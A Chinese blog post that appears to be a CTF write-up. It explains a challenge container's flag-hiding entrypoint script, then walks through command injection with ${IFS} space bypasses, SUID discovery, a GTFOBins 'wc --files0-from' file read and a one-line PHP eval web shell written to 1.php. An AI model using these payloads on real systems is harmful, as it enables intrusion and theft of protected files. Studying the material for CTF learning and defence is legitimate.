<!DOCTYPE html><html lang="zh-CN" theme-mode="dark"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"><title>Getshell | workwork</title><link rel="icon" type="image/x-icon" href="/favicon.ico"><link rel="preload" as="font" crossorigin="anonymous" href="/font/Bender.ttf"><link rel="preload" as="font" crossorigin="anonymous" href="/font/BenderLight.ttf"><link rel="preload" as="font" crossorigin="anonymous" href="/font/JetBrainsMono-Regular.woff2"><link rel="stylesheet" href="/css/arknights.css"><style>@font-face {
  font-family: Bender;
  src: local('Bender'), url("/font/Bender.ttf"), url("/font/Bender.otf");
}
@font-face {
  font-family: BenderLight;
  src: local('BenderLight'), url("/font/BenderLight.ttf");
}
@font-face {
  font-family: 'JetBrains Mono';
  src: local('JetBrains Mono'), url('/font/JetBrainsMono-Regular.woff2') format('woff2');
}
</style><script>var config = {"root":"/","code_fold":15,"search":{"preload":false,"activeHolder":"键入以继续","blurHolder":"数据检索","noResult":"无 $0 相关数据"},"code":{"codeInfo":"$0 - $1 行","copy":"复制"}}</script><link type="text/css" rel="stylesheet" href="/lib/encrypt/hbe.style.css"><script src="//unpkg.com/mermaid@10.5.0/dist/mermaid.min.js"></script><link type="text/css" rel="stylesheet" href="//unpkg.com/lightgallery@2.7.1/css/lightgallery.css"><link type="text/css" rel="stylesheet" href="//unpkg.com/lightgallery@2.7.1/css/lg-zoom.css"><link type="text/css" rel="stylesheet" href="//unpkg.com/lightgallery@2.7.1/css/lg-thumbnail.css"><link type="text/css" rel="stylesheet" href="/lib/fontawesome/css/all.min.css"><script>if (window.localStorage.getItem('theme-mode') === 'light')
 document.documentElement.setAttribute('theme-mode', 'light')
if (window.localStorage.getItem('theme-mode') === 'dark')
 document.documentElement.setAttribute('theme-mode', 'dark')</script><style>@font-face {
 font-family: BenderLight;
 src: local('Bender'), url("/font/BenderLight.woff2") format('woff2');
}
@font-face {
 font-family: 'JetBrains Mono';
 src: local('JetBrains Mono'), url('/font/JetBrainsMono-Regular.woff2') format('woff2');
}</style><style>:root {
 --dark-background: url('https://ak.hypergryph.com/assets/index/images/ak/pc/bk.jpg');
 --light-background: url('/img/bk.jpg');
 --theme-encrypt-confirm: '确认'
}</style><script defer src="/js/arknights.js"></script><script defer src="/js/search.js"></script><script defer type="module">import mermaid from '//unpkg.com/mermaid@10.5.0/dist/mermaid.esm.mjs';
window.mermaid = mermaid;
code.paintMermaid();
</script><script async src="//unpkg.com/lightgallery@2.7.1/lightgallery.min.js"></script><script async src="//unpkg.com/lightgallery@2.7.1/plugins/zoom/lg-zoom.min.js"></script><script async src="//unpkg.com/lightgallery@2.7.1/plugins/thumbnail/lg-thumbnail.min.js"></script><script async src="/lib/encrypt/hbe.js"></script><script async src="/js/pjax.js"></script><script class="pjax-js">reset= () => {document.querySelector('.lg-container')?.remove()
lightGallery(document.getElementById('post-bg'), {
  plugins: [lgZoom,lgThumbnail],
  selector: '.item-img'})}</script><script>window.addEventListener("load",() => {pjax = new Pjax({
 cacheBust: false,
 selectors: ['title','article','#aside-block','.pjax-js','data-pjax','.busuanzi'],
 switches: {'article': Pjax.switches.sideBySide},
 switchesOptions: {
   'article': {
     classNames: {
       remove: "pjax-out",
       add: "pjax-in"
     }
   }
 }
});
document.addEventListener("pjax:complete", reset);reset()})</script><script class="pjax-js">reset= () => {document.querySelector('.lg-container')?.remove()
lightGallery(document.getElementById('post-bg'), {
  plugins: [lgZoom,lgThumbnail],
  selector: '.item-img'})}</script><script>window.addEventListener("load",() => {pjax = new Pjax({
 cacheBust: false,
 selectors: ['title','article','#aside-block','.pjax-js'],
 switches: {'article': Pjax.switches.sideBySide},
 switchesOptions: {
   'article': {
     classNames: {
       remove: "pjax-out",
       add: "pjax-in"
     }
   }
 }
});
document.addEventListener("pjax:complete", reset);reset()})</script><meta name="generator" content="Hexo 7.3.0"></head><body><div class="loading" style="opacity: 0;"><div class="loadingBar left"></div><div class="loadingBar right"></div></div><main><header class="closed"><div class="navBtn"><i class="navBtnIcon"><span class="navBtnIconBar"></span><span class="navBtnIconBar"></span><span class="navBtnIconBar"></span></i></div><nav><div class="navItem" id="search-header"><span class="navItemTitle"><input autocomplete="off" autocorrect="off" autocapitalize="none" placeholder="数据检索" spellcheck="false" maxlength="50" type="text" id="search-input"></span></div><div class="navItem" id="search-holder"></div><div class="search-popup" tabindex="0"><div id="search-result"></div></div><ol class="navContent"><li class="navItem"><a class="navBlock" href="/"><span class="navItemTitle">Home</span></a></li><li class="navItem" matchdata="categories,tags"><a class="navBlock" href="/archives/"><span class="navItemTitle">Archives</span></a></li></ol></nav></header><article><div id="post-bg"><div id="post-title"><h1>Getshell</h1><div id="post-info"><span>文章发布时间: <div class="control"><time datetime="2025-03-17T11:17:46.000Z" id="date"> 2025-03-17</time></div></span><br><span>最后更新时间: <div class="control"><time datetime="2025-03-17T12:05:36.303Z" id="updated"> 2025-03-17</time></div></span></div></div><hr><div id="post-content"><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">文件docker-entrypoint.sh<br>#!/bin/sh   #声明<br>user=$(ls /home)  #后来没用到，无实际意义<br>if [ &quot;$DASFLAG&quot; ]; then<br>    INSERT_FLAG=&quot;$DASFLAG&quot;<br>    export DASFLAG=no_FLAG  # 导出修改后的环境变量<br>    DASFLAG=no_FLAG         # 覆盖当前脚本中的变量值<br>#export DASFLAG=no_FLAG：修改环境变量，让后续启动的程序（如 Apache）看到的是 no_FLAG，而非真实的 Flag。<br>#DASFLAG=no_FLAG：修改当前脚本中变量 DASFLAG 的值，防止后续代码误用。<br>#为什么需要双重操作（export + 直接赋值）？<br>#export：修改环境变量，影响所有 子进程（比如后续启动的 Apache）。<br><br>#直接赋值：修改当前脚本中的变量值，影响 当前进程。<br><br>#区别：<br><br>#如果只 export，当前脚本中 DASFLAG 的值还是真实的 Flag。<br><br>#如果只直接赋值，子进程（如 Apache）仍然能读取到原始的 DASFLAG。<br><br>#双重操作确保 当前脚本和子进程都看不到原始 Flag。<br>elif [ &quot;$FLAG&quot; ]; then<br>    INSERT_FLAG=&quot;$FLAG&quot;<br>    export FLAG=no_FLAG<br>    FLAG=no_FLAG<br>elif [ &quot;$GZCTF_FLAG&quot; ]; then<br>    INSERT_FLAG=&quot;$GZCTF_FLAG&quot;<br>    export GZCTF_FLAG=no_FLAG<br>    GZCTF_FLAG=no_FLAG<br>else<br>    INSERT_FLAG=&quot;flag&#123;TEST_Dynamic_FLAG&#125;&quot;<br>fi<br><br>echo $INSERT_FLAG | tee /flag  # 写入 Flag 到文件（/flag）<br>chmod 700 /flag               # 权限设为仅所有者可读写执行<br><br>exec apache2-foreground  #替换当前进程为 Apache 前台运行，保持容器活跃。<br></code></pre></td></tr></table></figure>

<p> 目的就是搜查三个环境变量，<strong>从环境变量中读取敏感信息（Flag），然后立即销毁环境变量中的flag痕迹，把真实flag存到&#x2F;flag中，但是需要所有者权限才能读取</strong></p>
<p>所以flag读不了考虑权限不够的原因，在url中提权 </p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">?action=run&amp;input=find$&#123;IFS&#125;/$&#123;IFS&#125;-perm$&#123;IFS&#125;-4000<br></code></pre></td></tr></table></figure>

<p>-perm 用于根据文件的权限来筛选文件，整句话的意思就是从根目录里头找具有SUID权限的文件（-4000）</p>
<p>提权过程<br>GTFOBins</p>
<p>第一步：将带有SUID权限的wc复制到当前目录</p>
<ol>
<li>. 表示当前目录</li>
</ol>
<p>2.install 是一个用于复制文件并设置其权限的命令，常用于安装软件包时将文件复制到指定位置，并确保文件具有合适的权限，基本语法：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">install [选项] 源文件 目标位置<br></code></pre></td></tr></table></figure>

<ol start="3">
<li>-m&#x3D;xs（也就是install的那个选项）：</li>
</ol>
<p>m：mode（权限），用于指定文件的权限模式。</p>
<p>xs：x 表示可执行权限，s 表示设置 SUID（SUID）或 SGID（Set Group ID）权限。在这个命令中，设置 SUID 权限意味着当其他用户执行这个文件时，它会以文件所有者的身份运行。</p>
<p>4.$(which wc)：which 是一个用于查找可执行文件位置的命令。$(…)首先会执行括号里的命令，然后将命令结果输出到原来位置</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">sudo install -m=xs $(which wc) .<br>加工<br>sudo$&#123;IFS&#125;install$&#123;IFS&#125;-m$&#123;IFS&#125;=xs$&#123;IFS&#125;$(which$&#123;IFS&#125;wc)$&#123;IFS&#125;.<br></code></pre></td></tr></table></figure>

<p>第二步：定义目标文件路径<br> 定义环境变量LFILE，指向受保护文件&#x2F;flag，后续可以通过$LFILE引用该路径，避免直接硬编 </p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">input=LFILE=/flag<br>实际命令<br>export LFILE=/flag<br></code></pre></td></tr></table></figure>

<p> 第三步：利用SUID的wc读取文件</p>
<ol>
<li><p>.&#x2F;wc：运行当前目录下已设置SUID的wc程序。</p>
</li>
<li><p>–files0-from：wc的一个选项，从指定文件读取输入（通常用于批量统计文件）。</p>
</li>
</ol>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">input=./wc --files0-from &quot;$LFILE&quot;<br>加工<br>input=./wc$&#123;IFS&#125;--files0-from$&#123;IFS&#125;&quot;$LFILE&quot;<br></code></pre></td></tr></table></figure>

<p>上面忽略，其实直接来到最后一步就行……</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">echo$&#123;IFS&#125;&#x27;&lt;?=eval($_POST[1]);?&gt;&#x27;$&#123;IFS&#125;&gt;1.php<br>将&lt;?=eval($_POST[1]);?&gt;写入1.php<br></code></pre></td></tr></table></figure>

<p>在蚁剑终端输入</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">/var/www/html/wc --files0-from &quot;/flag&quot; <br></code></pre></td></tr></table></figure>

<p class='item-img' data-src='https://i-blog.csdnimg.cn/direct/7910757cb66a4758b886af089a4fe15e.png'><img src="https://i-blog.csdnimg.cn/direct/7910757cb66a4758b886af089a4fe15e.png" alt="img"></p>
<div id="paginator"></div></div><div id="post-footer"><div id="pages"><div class="footer-link" style="width: 50%;text-align:right;border-right:1px #fe2 solid"><a href="/2025/03/18/Goph3rrr/">← 下一篇 Goph3rrr</a></div><div class="footer-link" style="width: 50%;right:1px;border-left:1px #fe2 solid"><a href="/2025/03/02/my-blog/">my blog 上一篇 →</a></div></div></div></div><div class="bottom-btn"><div><a class="i-top" id="to-top" onClick="scrolls.scrolltop();" title="回到顶部" style="opacity: 0; display: none;">∧ </a><a class="i-color" id="color-mode" onClick="colorMode.change()" title="切换主题"></a></div></div></article><aside><div id="about"><a href="/" id="logo"><img src="https://ak.hypergryph.com/assets/index/images/ak/pc/faction/1.png" alt="Logo" style="margin:0;border-radius:0;"></a><h1 id="Dr"><a href="/">heyi404</a></h1><div id="description"><p></p></div></div><div id="aside-block"></div><footer><nobr>构建自 <a target="_blank" rel="noopener" href="http://hexo.io">Hexo</a></nobr><wbr><nobr> 使用主题 <a target="_blank" rel="noopener" href="https://github.com/Yue-plus/hexo-theme-arknights">Arknights</a></nobr><wbr><nobr> 主题作者 <a target="_blank" rel="noopener" href="https://github.com/Yue-plus">Yue_plus</a></nobr></footer></aside></main><canvas id="canvas-dust"></canvas></body></html>